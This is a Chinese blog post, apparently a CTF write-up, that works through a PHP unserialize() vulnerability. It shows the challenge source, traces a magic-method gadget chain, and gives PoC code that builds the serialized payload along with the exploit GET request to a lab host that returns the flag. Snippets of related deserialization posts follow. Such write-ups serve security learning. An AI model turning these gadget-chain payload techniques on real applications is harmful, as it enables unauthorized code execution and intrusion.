反序列化漏洞(3), CTF夺旗

已于 2023-11-20 14:16:56 修改
阅读量338 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透测试-web漏洞 文章标签: 安全
于 2023-11-17 10:37:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bua200720411091/article/details/134456927
文章讲述了在CTF竞赛中,通过分析PHP代码中的反序列化过程,发现并利用了一个安全漏洞,通过构造特定的调用链序列化对象来获取flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

反序列化, CTF夺旗

一, 代码审计

1. 题目源码
<?php
class start_gg {
    public $mod1;
    public $mod2;
    public function __destruct() {
        $this->mod1->test1();
    }
}
class Call {
    public $mod1;
    public $mod2;
    public function test1() {
        $this->mod1->test2();
    }
}
class funct {
    public $mod1;
    public $mod2;
    public function __call($test2,$arr) {
        $s1 = $this->mod1;
        $s1();
    }
}
class func {
    public $mod1;
    public $mod2;
    public function __invoke() {
        $this->mod2 = "字符串拼接".$this->mod1;
    } 
}
class string1 {
    public $str1;
    public $str2;
    public function __toString() {
        $this->str1->get_flag();
        return "1";
    }
}
class GetFlag {
    public function get_flag() {
        echo "flag:"."59DB9139E685F7D6A4A8784F9221066F";
    }
}
$a = $_GET['string'];
unserialize($a);

?>
2. 分析调用链

夺旗我们可以从调用链的终点开始分析.

我们看到flag是在GetFlag类的get_flag()方法获取, 那么查找哪个类可以调用到 get_flag() , 找到 string1 类.

string1 中调用了 __toString() 方法, 那么查找哪个类可以调用到 __toString() 方法, 看到 func 类中使用 mod1 做了字符串拼接, 那么定位到 func 类.

func中调用了__invoke()方法, 那么查找哪个类里面有用函数形式调用对象的代码, 看到funct类中使用 s1() 的形式调用, 那么让mod1作为一个对象即可, 定位到funct类.

funct 中使用了__call()方法, 那么查找哪个类里面调用了不存在的方法, 看到 Call 类中调用了不存在的方法test2(), 所以定位到 Call 类.

Call 类中调用了 test1() 方法, 这不是一个魔术方法, 那么我们查看一下哪个类中直接调用了 test1() 这个方法, 看到在 start_gg 类中直接调用了test1()方法, 那么定位到 start_gg 类.

到此为止所有的类已经被我们串联了起来, 以 GetFlag为终点, start_gg为起点形成调用链.

二, 根据调用链编写POC

根据我们分析的调用链顺序逐步实例化对象, 注意实例化哪个对象和它赋值给哪个属性, 搞错任何一个位置调用链就会失败.

<?php
class GetFlag {
    public function get_flag() {
        echo "flag:"."59DB9139E685F7D6A4A8784F9221066F";
    }
}

class string1 {
    public $str1;
    public $str2;

    public function __construct(){
        $this->str1 = new GetFlag();
    }
    
}

class func {
    public $mod1;
    public $mod2;
    
    public function __construct(){
        $this->mod1 = new string1();
    }
}

class funct {
    public $mod1;
    public $mod2;

    public function __construct(){
        $this->mod1  = new func();
    }
}

class Call {
    public $mod1;
    public $mod2;
    
    public function __construct(){
        $this->mod1  = new funct();
    }
}

class start_gg {
    public $mod1;
    public $mod2;
    
    public function __construct(){
        $this->mod1  = new Call();
    }
}

echo serialize(new start_gg()); // 序列化对象, 得到字符串
?>

执行结果:

O:8:"start_gg":2:{s:4:"mod1";O:4:"Call":2:{s:4:"mod1";O:5:"funct":2:{s:4:"mod1";O:4:"func":2:{s:4:"mod1";O:7:"string1":2:{s:4:"str1";O:7:"GetFlag":0:{}s:4:"str2";N;}s:4:"mod2";N;}s:4:"mod2";N;}s:4:"mod2";N;}s:4:"mod2";N;}

三, 利用漏洞获取flag

根据题目源码的参数, 提交GET请求:

http://192.168.112.200/security/unserial/ustest.php
?string=O:8:"start_gg":2:{s:4:"mod1";O:4:"Call":2:{s:4:"mod1";O:5:"funct":2:{s:4:"mod1";O:4:"func":2:{s:4:"mod1";O:7:"string1":2:{s:4:"str1";O:7:"GetFlag":0:{}s:4:"str2";N;}s:4:"mod2";N;}s:4:"mod2";N;}s:4:"mod2";N;}s:4:"mod2";N;}

执行结果:

flag:59DB9139E685F7D6A4A8784F9221066F
CTF系列——反序列化漏洞
weixin_50699777的博客
04-22 940
题目 ctf2 找flag 找到题目之后要看源码!!! <?php error_reporting(0); include_once("flag.php"); $cookie = $_COOKIE['ISecer']; if(isset($_GET['hint'])){ show_source(__FILE__); } elseif (unserialize($cookie) === "$KEY") { echo "$flag"; } else { ?> 源码的意思是要g
ctfshow(262,264)--反序列化漏洞--字符串逃逸
m0_56019217的博客
10-23 954
源代码: index.php: message.php: 代码审计: index.php: 传参,实例化message类的对象为msg。 将msg序列化,并且将序列化字符串中的fuck字符全部替换为loveU字符,赋值给usmg。 setcookie函数设置cookie的名为msg,值为base64编码后的usmg。message.php: 当cookie被成功传入后,对cookie的值进行base64解码与反序列化。 若msg对象中的token值为admin,便输出flag.本题我们能控制的参数只有f,m
ctf系列——反序列化漏洞
超级无敌菜阿板的博客
05-26 4756
题目 http://123.206.87.240:8006/test1/ 拿到题之后先看源码 you are not the number of bugku ! <!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&a...
CTF-PHP反序列化漏洞5-反序列化字符逃逸
Eason_LYC安全白帽子的成长博客
05-15 2207
PHP反序列化漏洞是指攻击者通过构造恶意序列化数据,使得PHP的反序列化函数在反序列化时执行了恶意代码,从而导致安全漏洞。其中,反序列化字符逃逸是指攻击者在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。具体来说,PHP反序列化函数在反序列化时,会对序列化字符串中的特殊字符进行转义,例如将双引号转义为\”、将反斜杠转义为\等。攻击者可以利用这个特性,在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。?
反序列化漏洞
weixin_45007073的博客
02-03 336
序列化与反序列 序列化:把对象转换为字节序列的过程称为对象的序列化 反序列化:把字节序列恢复为对象的过程称为对象的反序列化 漏洞成因及本质 成因:反序列化对象中存在魔术方法,而且魔术方法中的代码可以被控制,漏洞根据不同的代码可以导致各种攻击,如代码注入、SQL注入、目录遍历等等。 本质:unserialize函数的变量可控、php文件中存在可利用的类,类中有魔术方法。 魔术方法 魔术方法 触发条件 __wakeup() 使用unserialize时触发 __sleep() 使用seria
PHP反序列化漏洞+CTF实例
hyq99999的博客
08-09 1389
整理php序列化相关知识点以及在CTF中的实例。
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
第85天:CTF-JAVA考点反编译&XXE&反序列化1
08-03
3. **反序列化漏洞**: Java的反序列化机制允许对象的状态从字节流恢复到对象实例。然而,如果序列化和反序列化过程没有正确地进行安全控制,攻击者可能注入恶意对象,触发任意代码执行。常见的利用方式包括构造特殊...
JMX 反序列化漏洞
蚁景网安学院
07-18 1132
前段时间看到普元 EOS Platform 爆了这个洞,Apache James,Kafka-UI 都爆了这几个洞,所以决定系统来学习一下这个漏洞点。JMX(Java Management Extensions,即 Java 管理扩展)是一个为应用程序、设备、系统等植入管理功能的框架。
反序列化漏洞原理ctf
最新发布
02-09
### 反序列化漏洞原理 反序列化漏洞,尤其是PHP反序列化漏洞,也被称作PHP对象注入。这类漏洞的发生是因为程序未能充分校验用户提交的反序列化数据,使得攻击者能够操控这些数据,在目标服务器上触发特定的行为或...
CTF:PHP反序列化字符逃逸漏洞
06-16 1477
作者:高玉涵 博客:blog.csdn.net/cg_i 时间:2021.6.16 22:26、。/>/ CTF入门好难 赛后,主办方给出答案后的第77天,我终于解开了这道题。 CTF作为流行在信息安全界著名竞赛,像我这种“被赶鸭子上架的程序员”——零基础。答案都看不懂,我太难了!不了解原理和背景,资料也无从找起。输了比赛不可怕,就怕输的不明不白,抱着这种不甘,也为了探究缘故,除了努力学习别无它法,期间走了不少弯路,终得解惑。这对于我来说,没有激动与喜悦,有得只是深刻。 现将解题过程分享出
反序列化漏洞实例解析:CTF挑战中的技巧与策略
weixin_43822401的博客
06-15 783
反序列化漏洞通常发生在应用程序接收序列化对象时,未能正确验证或清理输入数据,导致恶意构造的序列化数据被不当还原为对象,可能触发代码执行或其他安全问题。
几种反序列化漏洞
hongduilanjun的博客
08-30 870
当配置 session.serialize_handler = php_serialize 时,Session格式:a:1:{s:4:"user";s:3:"xxx";、s:3:"xxx";、a:2:{i:0;先访问这个生成:a:1:{s:4:"user";__wakeup绕过,大于实际值(PHP<=5.5),例:O:1:"c":100...__destruct调用,结构错误,例:O:1:"c":1:{xxx}
phar反序列化漏洞
Mi1k7ea
01-01 6112
之前做CTF遇到phar反序列化漏洞概念,这里小结一下,主要参考自https://paper.seebug.org/680/ 基本概念 phar (PHP Archive) 是PHP里类似于Java中jar的一种打包文件,用于归档。当PHP 版本&gt;=5.3时默认开启支持PHAR文件的。 phar文件默认状态是只读,使用phar文件不需要任何的配置。 而phar://伪协议即PHP归档...
shiro反序列化漏洞学习(工具+原理+复现)
heike_Ch的博客
06-15 1205
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
PHP反序列化
aetlypdlg_ys的博客
05-28 622
序列化是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。简而言之,序列化相当于加密,反序列化相当于解密。再看一个生动的例子:我们在网上买桌子,桌子这种很不规则的东西,这时候一般都会把它拆掉成板子,再运出去,这个过程就可看作序列化的过程(把数据转化为可以存储或者传输的形式)。当我们收到货后,需要自己把这些板子组装成桌子的样子,这个过程就像反序列的过程(转化成当初的数据对象)。php 将数据序列化和反序列化会用到两个函数serialize 将对象格式化成有序的字符串。
# php反序列化
yaoge1225的博客
07-17 126
php反序列化 PHP反序列化漏洞,通过控制read()读取flag.php的内容。 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename =
Shiro框架漏洞分析与复现
m0_59598029的博客
04-18 5723
ApacheShiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性,可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的Web 和企业应用程序。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值